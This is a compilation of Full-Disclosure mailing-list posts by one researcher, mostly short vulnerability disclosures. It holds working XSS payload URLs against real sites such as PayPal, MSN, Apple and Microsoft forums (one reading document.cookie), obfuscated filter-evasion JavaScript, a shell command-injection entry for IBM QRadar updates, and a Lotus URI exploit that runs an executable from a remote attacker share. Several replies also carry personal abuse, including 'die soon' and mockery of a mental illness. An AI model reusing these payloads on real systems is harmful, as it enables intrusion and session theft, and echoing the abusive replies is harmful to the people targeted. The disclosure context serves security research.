[Full-disclosure] ADV: IBM QRadar SIEM

[Thomas Pollet]

Hello,

Copy/paste from
http://thomaspollet.blogspot.be/2014/01/ibm-qradar-siem-csrf-xss-mitm-rce.html:

IBM QRadar SIEM CSRF - XSS - MITM - RCE
I have found the IBM QRadar Security Intelligence Platform auto update
mechanisms exposes a number of security bugs.

Web Interface Sreenshot (/console/do/qradar/autoupdateConsole)




   - The autoupdateConsole doesn't check for cross site request forgery
   - Input to the autoupdateConsole proxyUsername field is not sanitized,
   therefore it is possible to inject html into the web interface
   - The autoupdate mechanism doesn't check ssl certificates before
   downloading the updates
   - The autoupdate mechanism downloads a file scripts/script_list which
   contains a list of files together with their hash. The autoupdate process
   then tries to verify the hash but doing so, it doesn't escape shell
   characters. This way it is possible to execute commands. For example, the
   appliance will reboot if the script_list contains an entry


372e25f23b5a8ae33c7ba203412ace30  $(reboot)

   - The autoupdate mechanism runs as root


Regards,
Thomas
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] visiodays

[Thomas Pollet]

Hello,

There are huge amounts of memory corruption issues in visio.
To find them you can use any fuzzer on any vsd file.
To make things easy:
  1)  copy the fuzzed files to your webserver
  2)  attach a debugger to IE
  3)  use the html below.

(Also, running an activex fuzzer on the visio viewer activex is kinda
entertaining).


  

text





target.src="Tekening1.vsd"

var count=0;

function next(){
  vsd='bug-'+count+'.vsd';
  count++;
  document.getElementById('info').innerHTML=vsd;
  target.src=vsd;
  setTimeout("next()", 500);
}

next();
 


  



Regards,
Thomas
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] xss dot(.) filter evasion

[Thomas Pollet]

Hi,

2008/6/19 Andrew Farmer <[EMAIL PROTECTED]>:

> On 18 Jun 08, at 08:49, Thomas Pollet wrote:
>
>> I came across this site that implemented some filtering so the dots were
>> replaced by an underscore, also the quotes and backslash were escaped.
>> I came up with the code below to bypass this filtering (write anything to
>> the page using String.fromCharCode)
>> Someone knows a different way to do this?
>>
>
> eval makes everything easy. Well, reasonably easy.
>
> eval(unescape(String(/%2a%2a%2falert(%22xss%22);%2f%2a%2a/)));
>

the problem was I couldn't call the String class method fromCharCode as it
would be called by String.fromCharCode, so just using eval didn't really
solve this.
Using with(String) i didn't need to call fromCharCode the way a class method
is normally called.
Thanks for replying though.

Regards,
Thomas Pollet
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] xss dot(.) filter evasion

[Thomas Pollet]

Hello,

so,

with (String) { eval(fromCharCode( /* insert charcodes here */ ) )}

is what i needed

Regards,
Thomas Pollet

2008/6/18 Thomas Pollet <[EMAIL PROTECTED]>:
> Hello,
>
> I came across this site that implemented some filtering so the dots were
> replaced by an underscore, also the quotes and backslash were escaped.
> I came up with the code below to bypass this filtering (write anything to
> the page using String.fromCharCode)
> Someone knows a different way to do this?
>
> 
>  
>
>
>  
>  
> 
> function write(str){
>//document.write() doesn't work as it becomes document_write()
>var s = /write/;
>var w = String();
>var n = String();
>w += s;
>//cast to string so we can index
>w += s;
>n += w[1] + w[2] + w[3] + w[4] + w[5];
>//call document['write']
>document[n](str);
> }
> var s = /fromCharCode/;
> var w = String();
> var n = String();
> w += s;
> n += w[1] + w[2] + w[3] + w[4] + w[5] + w[6] + w[7] + w[8] + w[9] + w[10] +
> w[11] + w[12];
>
> write(String[n](60,97,32,104,114,101,102,61,34,104,116,116,112,58,47,47,119,104,97,116,101,118,101,114,46,99,111,109,34,47,
> 62,104,60,47,97,62));
>
> /*
> write(String[n](60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,104,46,99
> ,111,109,34,62));
> */
>
> 
>  
> 
>
> Regards,
> Thoms Pollet
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] xss dot(.) filter evasion

[Thomas Pollet]

Hello,

I came across this site that implemented some filtering so the dots were
replaced by an underscore, also the quotes and backslash were escaped.
I came up with the code below to bypass this filtering (write anything to
the page using String.fromCharCode)
Someone knows a different way to do this?


 
   
   
 
 

function write(str){
   //document.write() doesn't work as it becomes document_write()
   var s = /write/;
   var w = String();
   var n = String();
   w += s;
   //cast to string so we can index
   w += s;
   n += w[1] + w[2] + w[3] + w[4] + w[5];
   //call document['write']
   document[n](str);
}
var s = /fromCharCode/;
var w = String();
var n = String();
w += s;
n += w[1] + w[2] + w[3] + w[4] + w[5] + w[6] + w[7] + w[8] + w[9] + w[10] +
w[11] + w[12];

write(String[n](60,97,32,104,114,101,102,61,34,104,116,116,112,58,47,47,119,104,97,116,101,118,101,114,46,99,111,109,34,47,
62,104,60,47,97,62));

/*
write(String[n](60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,104,46,99
,111,109,34,62));
*/


 


Regards,
Thoms Pollet
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] unsubscribing

[Thomas Pollet]

Hello,

2008/5/8 poo <[EMAIL PROTECTED]>:
> aw come on thats not true! we need you! without you the secindustry would
> crumble and fall!

don't be sarcastic on this please. Because Andrew suffers from
borderline disorder, the use of irony in your wording is lost on him.
Andrew, thanks for unsubscribing, you won't be missed. Good luck with
the rest of your life.

Regards,
Thomas Pollet

>
>
>
>
> On Thu, May 8, 2008 at 3:08 PM, n3td3v <[EMAIL PROTECTED]> wrote:
>
> > you've made your point clear, you don't want me around. :(
> >
> > n3td3v
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
>
> --
> smile tomorrow will be worse
> ___
>  Full-Disclosure - We believe in it.
>  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>  Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] www.passwordsafe.com

[Thomas Pollet]

Hello,

I was reading this blog entry :
http://www.schneier.com/blog/archives/2008/05/the_doghouse_pa.html

I couldn't help but xss them a little.

Poc at :
http://signedness.org/~xz/pwtest.html

You need to be logged in for this to work.
All this can be improved but I'm gonna waste my time somewhere else now.

Regards,
Thomas Pollet

http://thomas.pollet.googlepages.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Web Application Security Awareness Day

[Thomas Pollet]

Hi,

Web Application Security Awareness Day was supposed to be the day I
> could shine and the security community could shine, but I don't feel
> like shining anymore.


I'd love to see you burn

Regards,
Tp
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Lotus expeditor rcplauncher uri handler vulnerability

[Thomas Pollet]

Hello,

I have found that the lotus expeditor rcplauncher as installed by lotus
symphony and possibly other products, registers a cai: uri handler.
This handler executes
"D:\Program Files\IBM\Lotus\Symphony\framework\rcp\rcplauncher.exe" -config
notes -com.ibm.rcp.portal.app.ui#openCA "%1"
the rcplauncher process accepts various arguments which can be abused to
execute arbitrary code.
The argument to the -launcher option for example is an executable that will
be executed.

malicious uri example:
cai:"%20-launcher%20\\6.6.6.6\d$\trojan

Regards,
Thomas Pollet <http://thomas.pollet.googlepages.com/>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] XSS in XChat.org

[Thomas Pollet]

http://autotrader.autos.msn.com/fyc/index.jsp?hide_nav=true&page=atcPartner&address=&year=&make=&model=&certified=&distance=25&search_type=both&LNX=MSNATMSNBCCLASSFYC');%7D%7Dalert('n3td3v%20sucks');%20function%20vvv()%7B%20if%20(0==0)%20%7Bvar%20ho=('&icid=autos_msnbc_2&num_records=25&h000=n000'%22%3E/

On 19/04/2008, n3td3v <[EMAIL PROTECTED]> wrote:
>
> On Sat, Apr 19, 2008 at 4:06 AM, Steve Cooperman <[EMAIL PROTECTED]>
> wrote:
> >
> http://xchat.org/cgi-bin/checkupdate.pl?version=2.8.8%22%3E%3Cframe%20src=%22http://youtube.com/watch?v=oHg5SJYRHA0
> >
> >
> >
> > --
> > Love,
> > Steve Cooperman
>
>
> I've noticed an increase in web application stuff on the list since April
> 15th.
> Please only post these on May 1st...
> it will look better if the list is full of xss for one day...and send
> out a bigger message to the powers that be who don't take web
> application security seriously enough.
>
> Btw, I see what you did there with the e-mail address, nice.
>
> All the best,
>
> n3td3v
>
> Web Application Security Awareness Day
> http://lists.grok.org.uk/pipermail/full-disclosure/2008-April/061507.html
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] gallarific backdoored , vulnerable to xss

[Thomas Pollet]

Hello,

I was looking at the free version of gallarific, and I found some suspicious
code in the scopbin directory.
Attached is a file I found in the zip i downloaded, in case someone wants to
decode it.

the package can be downloaded from
http://www.gallarific.com/download.php

Also, the software contains several xss flaws:

1) When modifying a user his email address like
[EMAIL PROTECTED]">alert(1);
persistent xss wil occur when viewing gadmin/users.php or moderating the
comments in gadmin/comments.php

2) When adding a comment like ">alert(1) , xss will occur
when moderating the comments

3) gallery/tags.php?tag=">alert(1)

4) probably more bugs.

Regards,
Thomas Pollet


911006.php
Description: Binary data
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] what is this?

[Thomas Pollet]

Mr. worthless security,

> stop replying to gadi evron he is a fruit cake.
>
> if we ignore him he will go away.
>
> :)

it didn't work for you, it won't work for G.E.

Regards,
T

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] NorfolkDesign.com proven track of excellence

[Thomas Pollet]

Hello,

My guess is that following link comes second for a google search for
norfolkdesign:
http://seclists.org/fulldisclosure/2007/Nov/0295.html
So now Ronnie is trying to seo spam fd.

Regards,
Thomas Pollet

p.s. Ronnie,  thanks for the spam, I apologize linking to Norfolkdesign
(http://seclists.org/fulldisclosure/2007/Nov/0295.html)<http://seclists.org/fulldisclosure/2007/Nov/0295.html>(lol)

On 15/01/2008, Dixon, Wayne <[EMAIL PROTECTED]> wrote:
>
>  That's great that Norfolk design is charitable, but what does that have
> to do with Full Disclosure?  Is there a breach of data or something?  What?
>
> Wayne
>
>  -Original Message-
> *From:* [EMAIL PROTECTED] [mailto:
> [EMAIL PROTECTED] *On Behalf Of *Ronnie - Norfolk
> Design
> *Sent:* Tuesday, January 15, 2008 4:34 PM
> *To:* full-disclosure@lists.grok.org.uk
> *Subject:* [Full-disclosure] NorfolkDesign.com proven track of excellence
>
>  Norfolk Design has a proven track record for excellence in its area.  Our
> clients' testimonials reflect this.
>
>
>
> Working alongside Norfolk Design, we have seen many small and struggling
> charities, grow and flourish.  We believe having a web-presence is very
> important for any charity to get their message across and drum-up as much
> support as possible.  Having a web-presence means charities have the
> potential to reach a global audience.
>
>
>
> Norfolk Design understands that charities are often on a very tight budget
> and so we continually ensure we provide offer the best possible value for
> money – often going that extra mile at no extra cost to the client.
>
> Kindest regards
>
> *Ronnie Zahdeh*
> Norfolk Design
> *Limits are in the mind, not on the web.*
>
> *E-mail: [EMAIL PROTECTED]
> *Website:* http://www.norfolkdesign.com
>
> The information contained in this email is sent from Norfolk Design and is
> intended to the addressed recipient(s) only. The content is confidential and
> privileged. If you are not the intended recipient please be aware that any
> disclosure, copying, distribution or use of the contents is prohibited and
> could be considered illegal. If you have received this electronic message in
> error, please accept our apologies, notify us immediately, and delete the
> message. It is important to note that this email may contain views which are
> the opinion of Norfolk Design.
>
> All email sent from Norfolk Design is scanned using both client-side and
> server-side multiple virus scanners using Norfolk Design's own servers. We
> take every measure possible to ensure our emails do not contain any viruses,
> but please note that we do not take responsibility if this eventuality
> occurs. It is your responsibility to ensure all emails you receive from
> Norfolk Design, are scanned with your own virus protection software.
>
>
>
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Javascript

[Thomas Pollet]

Hello,

fyi: I found the sitecatalyst software running on paypal.com to be
vulnerable to xss in the past. (unfiltered referer url was used as a
javascript value). Omniture/paypal didn't respond to my emails, paypal
fixed the issue after public disclosure.

Regards,
Thomas Pollet

On 14/01/2008, Michael Holstein <[EMAIL PROTECTED]> wrote:
>
> > This is from a current CNN home page:
> >
> > /* SiteCatalyst code version: H.10.
> > Copyright 1997-2007 Omniture, Inc. More info available at
> > http://www.omniture.com */
>
> Omniture is one of (many) sites that do tracking for companies .. like
> what your mouse moves over, how long it stays there, how long you view
> each page, etc. etc.
>
> This is why you should disable javascript for any site you don't
> explicitly trust (FYI: by default, NoScript for Firefox allows *msn.com
> *google.com, and a bunch of other stuff you probably don't want).
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Does this exist ?

[Thomas Pollet]

Hello,

a similar technique has been discussed here:
http://www.schneier.com/blog/archives/2007/06/perpetual_dogho.html

("The key is not transferred but is instead created from a file of any
size that is available on both a computer used to send a secure
message and a computer used to receive a secure message.")

Regards,
Thomas Pollet

On 05/07/07, Dan Becker <[EMAIL PROTECTED]> wrote:
>
> I have an idea that won't leave me alone and this list seems to have
> the most potential for knowing if the idea exists. My apologies for a
> somewhat offtopic post.
>
> Would there be a way to create a  rainbow table of tcp packets to be
> used to generate one packet for every 1000 or so normal packets simply
> by matching hashes with databases on both ends ?
>
> One could use this for crypto or simply traffic reduction over latent
> networks such as satellites.
>
> 
>
>   All message scanned for viruses with Clam Antivirus.
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Aventail Connect SSL VPN Client Buffer Overflow

[Thomas Pollet]

Hello,

Aventail Connect registers a layered service provider to handle DNS queries.
When resolving a hostname the software fails to check string boundaries
properly.
As the lsp intercepts all ws2_32 dns lookups every application performing
these operations is vulnerable.

e.g.

$ ssh $(perl -e 'print "a"x2200')
Segmentation fault (core dumped)

vulnerable copy loop in asnsp.dll:

18B539F2   41INC ECX
18B539F3   41INC ECX
18B539F4   66:85D2   TEST DX,DX
18B539F7   74 0A   JE SHORT asnsp.18B53A03
18B539F9   66:8B11   MOV DX,WORD PTR DS:[ECX]
18B539FC   66:8916   MOV WORD PTR DS:[ESI],DX
18B539FF   46   INC ESI
18B53A00   46   INC ESI
18B53A01  ^EB EF JMP SHORT asnsp.18B539F2

This was tested on version 4.1.2.13.
vendor: http://www.aventail.com/

Regards,
Thomas Pollet
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] UK ISP threatens security researcher

[Thomas Pollet]

Dear mr. Dr. Neal Krawetz, PhD,

On 18/04/07, Dr. Neal Krawetz, PhD <[EMAIL PROTECTED]> wrote:


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Let's keep in mind that publishing most security information
borders extortion.  There isn't any other industry where fat nerds
try to strongarm large corporations into admitting there are
weaknesses in their products, defaming them publicly, causing their
stock prices to fall, or otherwise damaging their public image and
thus causing financial damage, et cetera.



pretty cool, huh?

Gadi, I doubt your people would be thrilled if you tried to

petition Yahweh with complaints regarding His children being
vulnerable to pieces of metal fired at high velocity from guns, and
demanding that if things aren't fixed within what you consider a
satisfactory timeframe (which, in the end is just some arbitrary
number invented by people with no concept of industry and
economics) that you will arm every man, woman, child, and lizard of
bordering Arabic nations to Israel in order to teach that big guy
up in the sky a lesson about not making humans impervious to
gunfire!



Your analogies are flawed. I'm not going to elaborate on this.

Come on man!  You're smarter than this!  When socially inept people

who possess only rudimentary computer skills start bullying (call
it what you will, in the end if you argue against my points you
clearly are one of those people who can't make it in the real
world) corporations for fame and money, which have real-world
financial consequences to said corporate entities, you are in the
least committing extortion.  And while you might think these
efforts are noble, the reality of the situation is simple - this is
absolutely no different than a bunch of Russians with botnets,
forcing businesses to comply with their demands if that business
wishes to continue existing on the Internet.



So what about you? You enrolled in some university, then X years of
conformism later you "made" it in "the real world"? I bet your mom is proud
of you.

When was the last time an auto manufacturer was humiliated publicly

because their car windows can easily be broken and contents of the
car stolen?  When have chain manufacturers been chastised by the
mass media for the existence of bolt cutters?  What about the
serious threat of hacksaws?

People, grow up.  If your life is spent behind a computer
discovering uninteresting oversights in software design, where you
clearly lack experience and ability, and proclaiming yourself the
#chatzone badass and drolling saying "I'm the best evah!!!" doesn't
make you important.  The sad state of this industry is that there
are enough ignorant people that find it impressive, and who don't
understand the ramifications of their publicity whoring and the
obvious parallels to other industries.


The long and short of it is:

  If you want to act like a criminal, be prepared to be treated
like a criminal, and don't cry about the choices you've made in
life.  You aren't a fucking martyr when your motivations and cause
are only self-promoting and otherwise selfish.



the motivations of major corporations are any better? What are their
motivations again, ah right, ROI, TBD, BAU. QoS and customer satisfaction
isn't that high on the priority list if it's not related to the bucks.

Always remember the embarrassment to hackers, humans, and Hebrews

everywhere that is Kevin Mitnick.



what ethnic groups are ashamed by you? Prolly not the mba'ers or the
marketing department, they love people like you!

- - Dr. Neal Krawetz, PhD

http://www.hackerfactor.com/blog/

On Tue, 17 Apr 2007 19:30:54 -0400 Gadi Evron <[EMAIL PROTECTED]>
wrote:
>http://www.theregister.com/2007/04/17/hackers_service_terminated/
>
>"A 21-year-old college student in London had his internet service
>terminated and was threatened with legal action after publishing
>details
>of a critical vulnerability that can compromise the security of
>the ISP's
>subscribers."
>
>I happen to know the guy, and I am saddened by this.
>
>   Gadi.
>
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.5

wpwEAQECAAYFAkYmCAUACgkQDpFP8dW5K4bwFgP/Z2cmOC7HiPZ9Bp1p0VqC/1IMv40l
Vxi/gS/jMQMDG9XiIZqnDQQwMGm8OhnBu6LfMPi66Xnfr9ZV5zcE3wCeqlRfDsyAuAD7
TvpzfqAfhdLDgfG6hmX9BBZdpALXIa4ijwKuo4zs5uqtA/najmlIwgDjmGXC1NefQsZP
acyWgT8=
=zSxl
-END PGP SIGNATURE-

--
Click here for free information on earning a criminal justice degree
today.
http://tagline.hushmail.com/fc/CAaCXv1S4xxoKJy71c1syHceuiPxgdCh/


________

Re: [Full-disclosure] windows vulnerability? [was: Re: [Code-Crunchers] 137 bytes]

[Thomas Pollet]

Hello,On 08/11/06, Gadi Evron <
[EMAIL PROTECTED]> wrote:
On Wed, 8 Nov 2006, onisan wrote:> One thing is in this makes it even more interesting, most of the firewalls> do not block this download, so it's smallest and most dangerous downloader> at the same time :o
What Alex did is very impressive! Matthew Murphy came up with the ideaoriginally, I think, but it doesn't take from this amazing work in anyway.*awe struck*I'd say more though, it's a vulnerability.
If you can load a library remotely, and do so with no problems, it's avulnerability in Windows. I am not sure of what kind quite yet.Windows
handles UNC paths the same way as local  paths. Another mechanism used
to load a remote dll using a UNC path is described in 
http://opensores.thebunker.net/pub/mirrors/blackhat/presentations/win-usa-04/bh-win-04-litchfield/bh-win-04-litchfield.pdf
here the "system" directory is overwritten with a (unc)
directory owned by by the attacker. When GetSystemDirectoryW() is
called to load the faultrep.dll on exception, an attacker can supply
his backdoored faultrep.dll. I don't think you should classify this as
a vulnerability, it's known windows behaviour (yet, windows, a
vulnerability all by itself?).Regards,Thomas

The mother of all downloaders."The Zone has a new King!" -- Jeff, Coupling (BBC, UK).Gadi.> -- G>> 2006/11/8, Solar Eclipse <
[EMAIL PROTECTED]>:> >> > On Tue, Nov 07, 2006 at 10:56:42AM -0800, Peter Ferrie wrote:
> > > Why is the idata size present?  AFAIK, no Windows version checks it.
> > > Four bytes shorter, then (stop at the idata rva non-zero byte)?> >> > You're right, you can remove the last field and bring the file size down> > to 133 bytes. That's what I get for claiming that the size can't be
> > improved :-)> >> > Solar> > ___> > Code-Crunchers mailing list> > 

Code-Crunchers@whitestar.linuxbox.org> > http://whitestar.linuxbox.org/mailman/listinfo/code-crunchers

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Live is Live

[Thomas Pollet]

On 20/09/06, c0ntex <[EMAIL PROTECTED]> wrote:
Nothing new, been flawed for ever and shall remain so until the end of time  :-)I have to second this...
http://soapbox.msn.com/betaplayer.aspx?vid=c1b72697-d9aa-41eb-a72f-a71812096b8e&wa=wsignin1.0&'+alert(1)+' 
http://open-security.org/msn.JPGOn 20/09/06, bluepill <[EMAIL PROTECTED]> wrote:>> 
http://www.live.com/?%3Ci%3E>> Oh my.>> Luckily this company doesn't produce anything people need to rely on in terms of security, such as... an OS, a database, a web server, a distributed online authentication system or something.
>>> _> Porn on your PC? Are you sure ? Scan your PC for FREE Now> --- http://www.contentpurity.com/scanintro.htm
 --->> PC running slower? Tons of pop-ups?   You have spyware on your PC.  Click here for a FREE SCAN!> --- http://www.contentpurity.com/ccount/click.php?id=1
 --->> You may need to copy and paste the links about into your browser.>> ___> Full-Disclosure - We believe in it.> Charter: 
http://lists.grok.org.uk/full-disclosure-charter.html> Hosted and sponsored by Secunia - http://secunia.com/>--regardsc0ntex___
Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - 
http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Re: George Bush appoints a 9 year old to be the chairperson of the Information Security Deportment

[Thomas Pollet]

utdallas allumni page
http://utdallas.edu/siteindex/index.php?id=%3Cimg%20src=http://news.bbc.co.uk/olmedia/159/images/_1591076_osama_300.jpg%3E
Better get back to work instead of evangelizing the new world order.Greets,Thomas
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] further to the XSS flaw in eEye by Valerie Marchuk

[Thomas Pollet]

On 21/08/06, Alan Shimel <[EMAIL PROTECTED]> wrote:














I posted further today to the XSS flaw found in the eEye web
site with quotes from the eEye CEO. 

 

You can read it here:  
http://www.stillsecureafteralltheseyears.com/ashimmy/2006/08/but_if_doesnt_b.html

 

 

Would welcome comments on whether you think it is harmless
or not?Mostly harmless, just a sign of decay/bad security engineering practices.Some sites _do_ know how to provide secure webservices.for the record:
http://boards.live.com/Travelboards/board.aspx?BoardID=144&y000=%20--%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E

http://movies.msn.com/movies/genre.aspx?genre=Comedy&');alert('xssGreets,Thomas
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Re: apple.com xss

[Thomas Pollet]

http://searchcgi.apple.com/cgi-bin/sp/nph-searchpre11.pl?q=-->+mac+<script
>alert(1)script>&output=xml_no_dtd&client=default_frontend&site=us_only&
lr=lang_en&sort=&start=&access=p&oe=utf-8On 11/08/06, 
Thomas Pollet <[EMAIL PROTECTED]> wrote:
apple.com search form xss ( POST var )--> mac alert(1)


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] apple.com xss

[Thomas Pollet]

apple.com search form xss ( POST var )--> mac alert(1)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] msn.com xss

[Thomas Pollet]

http://my.msn.com/newmodule.armx?tab=1&tok=phUDAgZEgN/xhXawy4jZMg';alert(1);r.p='==&page=1&col=0

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] live.com xss

[Thomas Pollet]

http://boards.live.com/Travelboards/search.aspx?search=\";-->alert(1)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: micosoft.com xss

[Thomas Pollet]

Painfully obvious, yet I did pwn about every megacorp on the block :pOn 08/08/06, Mad World <[EMAIL PROTECTED]
> wrote:For such a words you could eat your hat if I would like to go in public.
It's a last time i am teaching script kiddies for something beond their understanding.I would like that you have at least small area in your brains that restricts your tong.If you wouldn't be script kiddie you would take your words back and learn instead.
Yesterdays code is here:
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] paypal.com xss (was Re: micosoft.com xss)

[Thomas Pollet]

Man you suck, codes or stfu.I know the code is broken in more than 1 place, i tried registering event handlers, exiting jscript etc. etc. time to move onpoint is xss is everywhere, trust noone etc. etc.
To make my point clear... last of the [EMAIL PROTECTED]GET https://www.paypal.com/cgi-bin/webscr?cmd=_registration-run HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
Referer: https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&source_page=_profile-comparison";alert("xss");var%20f="
results in<br><!--<br>/* SiteCatalyst Variables */<br>s.pageName="SignUp:Landing Page";<br>s.prop11="general/SignupInitial.xsl::_registration-run::0";
<br>s.channel="Sign Up:Landing Page";<br>s.r="<a rel="nofollow" href="https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&amp;source_page=_profile-comparison">https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&amp;source_page=_profile-comparison
</a>";alert("xss");var%20f="";<br>s.prop7="Unknown";<br>s.prop8="Unknown";<br>s.prop9="Unknown";<br>s.prop10="US";<br>s.prop12="Unknown";<br>s.visitorSampling=
"20";<br>/* DO NOT ALTER ANYTHING BELOW THIS LINE ! **/<br>var s_code=s.t();if(s_code)document.write(s_code) // --><br>in other words referer url isn't correctly cleaned for paypal registration page and used for js var.
poc: go tohttps://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&source_page=_profile-comparison";alert("xss");s.r="
and click on the sign up linkHave a nice life, die soon,ThomasOn 08/08/06, Mad World <[EMAIL PROTECTED]> wrote:
Good morning !You can doubt, it's your right to do so.Wanna bet ?Just open your eyes and your nose will show you that you are actually braking silly structure of page in more than one place ..
I's relatively easy using the same exact place of code you tried to make it.I have working example, it is based on other microsoft "features" as well.Greets,- Mad World--- 
[EMAIL PROTECTED] wrote:From: "Thomas Pollet" <[EMAIL PROTECTED]>To: [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.ukSubject: Re: [Full-disclosure] Re: micosoft.com xssDate: Tue, 8 Aug 2006 10:18:56 +0200
On 08/08/06, Mad World <[EMAIL PROTECTED]> wrote:  Why do you need it ?  You already discovered xss, the rest of "job" is just matter  of technique.
  I  think  majority  of  xss  submitters  here could do it by  various means.  M$ is lost in its own complexity of how to do simple things.  If  you  could ever give me reasonable answer for why do you
  need  this  $hit  - I could give you the "rest", like others  could.I  doubt  you  actually  tried getting js executed on page load(for some reason they try to prevent xss in a number of ways).
I did try and didn't succeed, that's why I ask.Greets,Thomas_Visit Thailand @ http://www.sawadee.com
Websearch and email: DNSASIA.com   FAST!128k dialup: login.samuinet.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] microsoft.com xss #2

[Thomas Pollet]

Hello,for what it's worth..
http://forums.microsoft.com/MSDN/Search/Search.aspx?words=ms&localechoice=9&SiteID=1&searchscope='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&ForumID=45Greets,Thomas
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: micosoft.com xss

[Thomas Pollet]

